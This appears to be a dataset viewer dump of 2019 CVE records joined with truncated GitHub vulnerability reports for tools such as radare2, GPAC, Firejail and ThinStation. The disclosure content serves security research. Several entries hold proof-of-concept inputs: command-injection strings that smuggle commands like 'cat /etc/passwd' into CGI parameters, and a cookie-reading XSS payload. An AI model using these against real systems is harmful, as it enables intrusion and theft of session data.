cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2018-20840
2019-05-30T16:29:01.323
An unhandled exception vulnerability exists during Google Sign-In with Google API C++ Client before 2019-04-10. It potentially causes an outage of third-party services that were not designed to recover from exceptions. On the client, ID token handling can cause an unhandled exception because of misinterpretation of an ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/google/google-api-cpp-client/issues/57" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:api_c\\+\\+_client:*:*:*:*:*:*:*:*", "matchCriteriaId": "7FC7B0D8-5460-4105-BE2B-FD5AF56BE847", "versionEndExcluding": "2019-04-10", "versionEndIncluding": null, "vers...
[ "754" ]
754
https://github.com/google/google-api-cpp-client/issues/57
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "google", "google-api-cpp-client" ]
Problem: The following errors occurred during the attempt to request ID Token with specifying ‘profile’ or ‘email’ in SCOPES parameter. ``` terminate called after throwing an instance of 'std::runtime_error' what(): Type is not convertible to string ``` Cause: When receiving ID Token from Google OAuth Serve...
Error on 'exp' type handling in ID Token
https://api.github.com/repos/google/google-api-cpp-client/issues/57/comments
7
2018-08-10T00:58:24Z
2019-06-26T21:36:50Z
https://github.com/google/google-api-cpp-client/issues/57
349,340,458
57
409
CVE-2019-12481
2019-05-30T23:29:00.267
An issue was discovered in GPAC 0.7.1. There is a NULL pointer dereference in the function GetESD at isomedia/track.c in libgpac.a, as demonstrated by MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1249" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00030.html" }, { "source": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "476" ]
476
https://github.com/gpac/gpac/issues/1249
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough info...
4 bugs found in gpac v0.7.1 release
https://api.github.com/repos/gpac/gpac/issues/1249/comments
2
2019-05-27T07:11:13Z
2019-07-10T08:47:22Z
https://github.com/gpac/gpac/issues/1249
448,700,419
1,249
410
CVE-2019-12564
2019-06-03T00:29:00.217
In DouCo DouPHP v1.5 Release 20190516, remote attackers can view the database backup file via a brute-force guessing approach for data/backup/DyyyymmddThhmmss.sql filenames.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/srsec/-srsec-/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:douco:douphp:1.5:20190516:*:*:*:*:*:*", "matchCriteriaId": "6EEBF95D-05FA-479D-AECD-108D4BFC3EC8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "287" ]
287
https://github.com/srsec/-srsec-/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "srsec", "-srsec-" ]
The latest version of DouPHP v1.5 Release 20190516, the background can back up the entire station data, but does not have access control on the backup file, resulting in any user can view or now the database file. 1、Log in to the background and back up data through the data backup function,And generate a sql file i...
Invalid identity authentication vulnerability, any user can view the download database backup file
https://api.github.com/repos/srsec/-srsec-/issues/1/comments
1
2019-05-22T08:41:54Z
2019-07-29T05:11:06Z
https://github.com/srsec/-srsec-/issues/1
447,006,539
1
411
CVE-2019-12566
2019-06-03T00:29:00.263
The WP Statistics plugin through 12.6.5 for Wordpress has stored XSS in includes/class-wp-statistics-pages.php. This is related to an account with the Editor role creating a post with a title that contains JavaScript, to attack an admin user.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wp-statistics/wp-statistics/commit/aec4359975344f75385ae1ec257575d8131d6ec2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*", "matchCriteriaId": "8103C017-B41E-4301-A65E-A8D702EE5F57", "versionEndExcluding": null, "versionEndIncluding": "12.6.5", "v...
[ "79" ]
79
https://github.com/wp-statistics/wp-statistics/issues/271
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "wp-statistics", "wp-statistics" ]
I was testing on : - Wordpress 5.2.1 - WP Statistic 12.6.5 Account with Editor role can create Post with Title that contain javascript/html. For example : `<script>alert(document.cookie)</script>` ![image](https://user-images.githubusercontent.com/12135974/58610016-1c3dca80-82d4-11e9-8edd-145e4559aa9d.png)...
Page's title should be encoded or filtering html entities/javascript code
https://api.github.com/repos/wp-statistics/wp-statistics/issues/271/comments
6
2019-05-30T05:14:25Z
2019-06-04T07:58:32Z
https://github.com/wp-statistics/wp-statistics/issues/271
450,133,639
271
412
CVE-2019-12589
2019-06-03T03:29:00.320
In Firejail before 0.9.60, seccomp filters are writable inside the jail, leading to a lack of intended seccomp restrictions for a process that is joined to the jail after a filter has been modified by an attacker.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netblue30/firejail/commit/eecf35c2f8249489a1d3e512bb07f0d427183134" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:firejail_project:firejail:*:*:*:*:-:*:*:*", "matchCriteriaId": "D201C371-BB17-4E90-8125-740E84785DE4", "versionEndExcluding": "0.9.60", "versionEndIncluding": null, "versionS...
[ "732" ]
732
https://github.com/netblue30/firejail/issues/2718
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "netblue30", "firejail" ]
seccomp filters are copied into `/run/firejail/mnt`, and are writable within the jail. A malicious process can modify files from inside the jail. Processes that are later joined to the jail will not have seccomp filters applied. ## repro steps compile program to call blacklisted syscall ``` gcc -xc - <<EOF ...
seccomp bypass when joining existing jail
https://api.github.com/repos/netblue30/firejail/issues/2718/comments
27
2019-05-21T08:36:14Z
2019-06-08T18:00:38Z
https://github.com/netblue30/firejail/issues/2718
446,487,530
2,718
413
CVE-2019-12728
2019-06-04T13:29:00.590
Grails before 3.3.10 used cleartext HTTP to resolve the SDKMan notification service. NOTE: users' apps were not resolving dependencies over cleartext HTTP.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/grails/grails-core/issues/11250" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://objectcomputing.com/news/2019/05/30/possib...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:grails:grails:*:*:*:*:*:*:*:*", "matchCriteriaId": "918A84B3-E1D0-47CD-B2D6-BB7641DA3105", "versionEndExcluding": "3.3.10", "versionEndIncluding": null, "versionStartExcludin...
[ "494" ]
494
https://github.com/grails/grails-core/issues/11250
[ "Exploit", "Third Party Advisory" ]
github.com
[ "grails", "grails-core" ]
[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html) [CWE-494: Download of Code Without Integrity Check](https://cwe.mitre.org/data/definitions/494.html) The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. A...
[SECURITY] Releases are built/executed/released in the context of insecure/untrusted code
https://api.github.com/repos/apache/grails-core/issues/11250/comments
21
2019-02-19T21:52:47Z
2022-11-20T20:05:35Z
https://github.com/apache/grails-core/issues/11250
412,141,731
11,250
414
CVE-2019-12732
2019-06-06T15:29:01.030
The Chartkick gem through 3.1.0 for Ruby allows XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.6, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://github.com/ankane/chartkick/blob/master/CHANGELOG.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url":...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chartkick_project:chartkick:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "64BAA589-ABFA-46B8-AE08-3F60098AB9A1", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", "vers...
[ "79" ]
79
https://github.com/ankane/chartkick/issues/488
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ankane", "chartkick" ]
Under certain conditions, the Chartkick Ruby gem is vulnerable to a cross-site scripting (XSS) attack. This vulnerability has been assigned the CVE identifier CVE-2019-12732. Versions Affected: 3.1.0 and below Fixed Versions: 3.2.0 ## Impact Chartkick is vulnerable to a cross-site scripting (XSS) attack ...
XSS Vulnerability in Chartkick Ruby Gem
https://api.github.com/repos/ankane/chartkick/issues/488/comments
0
2019-06-04T19:07:47Z
2019-07-05T18:52:34Z
https://github.com/ankane/chartkick/issues/488
452,159,653
488
415
CVE-2019-12760
2019-06-06T19:29:00.500
A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/davidhalter/parso/issues/75" }, { "source...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:parso_project:parso:*:*:*:*:*:*:*:*", "matchCriteriaId": "B538BE6F-AEC7-4E13-BDDF-7442A2958EC5", "versionEndExcluding": null, "versionEndIncluding": "0.4.0", "versionStartExc...
[ "502" ]
502
https://github.com/davidhalter/parso/issues/75
null
github.com
[ "davidhalter", "parso" ]
**Vulnerability Description** : See [CVE-2019-12760](https://nvd.nist.gov/vuln/detail/CVE-2019-12760) **Note** : Let us be honest, this should be very unlikely to be exploitable in the wild.
Deserialization vulnerability (CVE-2019-12760)
https://api.github.com/repos/davidhalter/parso/issues/75/comments
37
2019-06-11T08:51:37Z
2019-07-13T13:54:29Z
https://github.com/davidhalter/parso/issues/75
454,561,153
75
416
CVE-2019-12771
2019-06-07T14:29:00.307
Command injection is possible in ThinStation through 6.1.1 via shell metacharacters after the cgi-bin/CdControl.cgi action= substring, or after the cgi-bin/VolControl.cgi OK= substring.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Thinstation/thinstation/issues/427" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinstation_project:thinstation:*:*:*:*:*:*:*:*", "matchCriteriaId": "D90EFCB4-24AA-4E8F-AF49-FF57F2574F85", "versionEndExcluding": null, "versionEndIncluding": "6.1.1", "ver...
[ "78" ]
78
https://github.com/Thinstation/thinstation/issues/427
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Thinstation", "thinstation" ]
The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi-bin/CdControl.cgi and /cgi-bin/VolControl.cgi. PoC: /cgi-bin/CdControl.cgi: action=;id eject;ifconfig back;ls -alt forward;whoami pause;hostname /cgi-bin/VolControl.cgi: OK=;cat /etc/passwd Please patch as...
CGI Generic Command Execution
https://api.github.com/repos/Thinstation/thinstation/issues/427/comments
5
2019-06-06T23:12:21Z
2019-06-17T04:18:32Z
https://github.com/Thinstation/thinstation/issues/427
453,276,017
427
417
CVE-2019-12779
2019-06-07T20:29:00.857
libqb before 1.0.5 allows local users to overwrite arbitrary files via a symlink attack, because it uses predictable filenames (under /dev/shm and /tmp) without O_EXCL.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 6.6, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00017.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00027.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:clusterlabs:libqb:*:*:*:*:*:*:*:*", "matchCriteriaId": "74096D2C-384E-446D-8A07-6F58DEBA04C7", "versionEndExcluding": "1.0.5", "versionEndIncluding": null, "versionStartExclu...
[ "59" ]
59
https://github.com/ClusterLabs/libqb/issues/338
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ClusterLabs", "libqb" ]
Libqb creates files in world-writable directories (`/dev/shm`, `/tmp`) with rather predictable file names (e.g. `/dev/shm/qb-usbguard-request-7096-835-12-data` in case of USBGuard). Also `O_EXCL` flag is not used when opening the files. This could be exploited by a local attacker to overwrite privileged system files (i...
Insecure Temporary Files
https://api.github.com/repos/ClusterLabs/libqb/issues/338/comments
62
2019-03-01T14:15:25Z
2022-02-03T14:51:51Z
https://github.com/ClusterLabs/libqb/issues/338
416,121,589
338
418
CVE-2019-12790
2019-06-10T19:29:00.700
In radare2 through 3.5.1, there is a heap-based buffer over-read in the r_egg_lang_parsechar function of egg_lang.c. This allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact because of missing length validation in libr/egg/egg.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14211" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.o...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0EAF4EA5-271D-41A3-902C-1E640CBF03C3", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcludin...
[ "125" ]
125
https://github.com/radare/radare2/issues/14211
[ "Exploit", "Third Party Advisory" ]
github.com
[ "radare", "radare2" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bit...
ragg2 crash on long valid input.
https://api.github.com/repos/radareorg/radare2/issues/14211/comments
2
2019-06-02T19:35:30Z
2019-06-03T15:43:11Z
https://github.com/radareorg/radare2/issues/14211
451,226,398
14,211
419
CVE-2019-10226
2019-06-10T23:29:02.467
HTML Injection has been discovered in the v0.19.0 version of the Fat Free CRM product via an authenticated request to the /comments URI. NOTE: the vendor disputes the significance of this report because some HTML formatting (such as with an H1 element) is allowed, but there is a XSS protection mechanism.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/152263/Fat-Free-CRM-0.19.0-HTML-Injection.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://apidock.com/rails/ActionView/Helpers/Te...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fatfreecrm:fat_free_crm:0.19.0:*:*:*:*:*:*:*", "matchCriteriaId": "D85D91B5-2F95-4804-906C-C489AD599283", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "79" ]
79
https://github.com/fatfreecrm/fat_free_crm/issues/1235
null
github.com
[ "fatfreecrm", "fat_free_crm" ]
Back in 2019, a post appeared incorrectly claiming to have found a vulnerability in Fat Free CRM: http://packetstormsecurity.com/files/152263/Fat-Free-CRM-0.19.0-HTML-Injection.html This claim was submitted to the Fat Free CRM security mailing list at the time and was checked out. It was found to be false positive b...
Address issue with incorrect open CVE-2019-10226
https://api.github.com/repos/fatfreecrm/fat_free_crm/issues/1235/comments
6
2024-02-21T09:36:35Z
2024-02-28T14:01:38Z
https://github.com/fatfreecrm/fat_free_crm/issues/1235
2,146,259,070
1,235
420
CVE-2019-12802
2019-06-13T21:29:16.270
In radare2 through 3.5.1, the rcc_context function of libr/egg/egg_lang.c mishandles changing context. This allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact (invalid memory access in r_egg_lang_parsechar; invalid free in rcc_pusharg).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14296" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0EAF4EA5-271D-41A3-902C-1E640CBF03C3", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcludin...
[ "416" ]
416
https://github.com/radare/radare2/issues/14296
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "radare", "radare2" ]
Ragg2 lacks boundary check when changing context in [here](https://github.com/radare/radare2/blob/master/libr/egg/egg_lang.c#L769). When `CTX=31 && delta=1` or `CTX=0 && delta=-1`, `CTX` would be out of boundary. As a result, it could cause both invalid memory access and invalid free. ### Work environment | Quest...
Ragg2 Lacks Boundary Check when Changing Context
https://api.github.com/repos/radareorg/radare2/issues/14296/comments
1
2019-06-13T18:56:39Z
2019-06-21T07:43:05Z
https://github.com/radareorg/radare2/issues/14296
455,902,075
14,296
421
CVE-2019-11770
2019-06-14T14:29:00.530
In Eclipse Buildship versions prior to 3.1.1, the build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other depende...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "emo@eclipse.org", "tags": [ "Vendor Advisory" ], "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=547734" }, { "source": "emo@eclipse.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eclips...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:buildship:*:*:*:*:*:*:*:*", "matchCriteriaId": "EBF9674F-C2C1-4616-8D8E-F0377906955C", "versionEndExcluding": "3.1.1", "versionEndIncluding": null, "versionStartExclu...
[ "669" ]
669
https://github.com/eclipse/buildship/issues/855
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "eclipse", "buildship" ]
[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html) The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifac...
Releases should not depend on insecure or untrusted code
https://api.github.com/repos/eclipse-buildship/buildship/issues/855/comments
8
2019-02-18T21:04:48Z
2019-07-01T13:56:05Z
https://github.com/eclipse-buildship/buildship/issues/855
411,643,301
855
422
CVE-2019-12829
2019-06-15T17:29:10.637
radare2 through 3.5.1 mishandles the RParse API, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact, as demonstrated by newstr buffer overflows during replace operations. This affects libr/asm/asm.c and libr/parse/parse.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14303" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0EAF4EA5-271D-41A3-902C-1E640CBF03C3", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcludin...
[ "787" ]
787
https://github.com/radare/radare2/issues/14303
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "radare", "radare2" ]
For x86.pseudo (and other RParsePlugins), function [replace](https://github.com/radare/radare2/blob/66f7403245/libr/parse/p/parse_x86_pseudo.c#L15) lacks a boundary check for `newstr`, leading heap-/stack-based buffer over-write. So do other RParsePlugins. Such buffer overflow could be trigger from [rasm2](https://g...
Function r_parse_parse Lacks Boundary Check
https://api.github.com/repos/radareorg/radare2/issues/14303/comments
3
2019-06-15T04:49:02Z
2019-06-15T11:24:09Z
https://github.com/radareorg/radare2/issues/14303
456,499,551
14,303
423
CVE-2019-12835
2019-06-15T19:29:00.173
formats/xml.cpp in Leanify 0.4.3 allows for a controlled out-of-bounds write in xml_memory_writer::write via characters that require escaping.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JayXon/Leanify/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:leanify_project:leanify:0.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "08AC077C-4E5F-49EB-8429-B16451564D34", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "787" ]
787
https://github.com/JayXon/Leanify/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JayXon", "Leanify" ]
Controlled Length Out of Bounds Write Using the corpus of test files from the previous crash I also included an XML file. The crash is relative to the XML library implementation of Leanify resulting in another issue with an OOB write independent of the fixed OOB Read/Write in ICO. I discovered this via fuzzing and d...
Fuzzing Tests: OOB Write in XML Parser
https://api.github.com/repos/JayXon/Leanify/issues/52/comments
0
2019-05-24T18:22:27Z
2019-06-07T02:27:12Z
https://github.com/JayXon/Leanify/issues/52
448,298,334
52
424
CVE-2019-12865
2019-06-17T23:15:13.130
In radare2 through 3.5.1, cmd_mount in libr/core/cmd_mount.c has a double free for the ms command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14334" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.o...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0EAF4EA5-271D-41A3-902C-1E640CBF03C3", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcludin...
[ "415" ]
415
https://github.com/radare/radare2/issues/14334
[ "Exploit", "Third Party Advisory" ]
github.com
[ "radare", "radare2" ]
Function [cmd_mount](https://github.com/radare/radare2/blob/a49bb7cf6698ed4fded0f36b12e019e61df1d2f8/libr/core/cmd_mount.c#L460) would **Double Free** [cwd](https://github.com/radare/radare2/blob/f10da2e8ef/libr/core/cmd_mount.c#L475) via malicious commands. Basically, first command `ms` to get in [fs_shell](https:/...
Double-Free in cmd_mount Causes Crash
https://api.github.com/repos/radareorg/radare2/issues/14334/comments
4
2019-06-17T05:08:54Z
2019-06-19T00:07:11Z
https://github.com/radareorg/radare2/issues/14334
456,745,292
14,334
425
CVE-2019-12872
2019-06-18T14:15:11.963
dotCMS before 5.1.6 is vulnerable to a SQL injection that can be exploited by an attacker of the role Publisher via view_unpushed_bundles.jsp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://dotcms.com/security/SI-53" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/dotCMS/core/issues/16624" }, { "source": "af854a3a-2127-422b-9...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*", "matchCriteriaId": "BD436941-B39F-4587-BCAD-D2A9F422F19F", "versionEndExcluding": "5.1.6", "versionEndIncluding": null, "versionStartExcluding...
[ "89" ]
89
https://github.com/dotCMS/core/issues/16624
[ "Third Party Advisory" ]
github.com
[ "dotCMS", "core" ]
This is a placeholder for a reported security issue - details can be be found here: https://docs.google.com/document/d/1XbruRRlPAIiayZdcqo0bFqcLlwdiOncDcbY2KwmGL2Y/edit
PlaceHolder for Security Issue
https://api.github.com/repos/dotCMS/core/issues/16624/comments
